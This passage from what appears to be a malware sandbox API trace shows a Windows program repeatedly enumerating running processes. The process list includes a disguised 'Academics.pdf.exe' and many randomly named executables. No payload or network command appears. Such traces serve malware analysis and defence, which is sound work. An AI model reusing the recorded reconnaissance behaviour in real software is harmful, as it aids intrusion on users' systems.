lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.323] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.324] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.325] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.326] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.327] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.328] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.329] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.330] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.331] CloseHandle (hObject=0x294) returned 1 [0294.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0294.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.331] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0294.331] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0294.333] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0294.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0294.336] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.337] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0294.338] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0294.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0294.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0294.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0294.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0294.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0294.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0294.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0294.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0294.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0294.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0294.358] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0294.359] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0294.360] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0294.361] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0294.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0294.362] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0294.363] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0294.364] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0294.365] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0294.366] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0294.367] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0294.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0294.368] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0294.369] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0294.370] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.371] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.372] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0294.373] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.374] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0294.375] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.376] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0294.377] CloseHandle (hObject=0x294) returned 1 [0294.377] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, 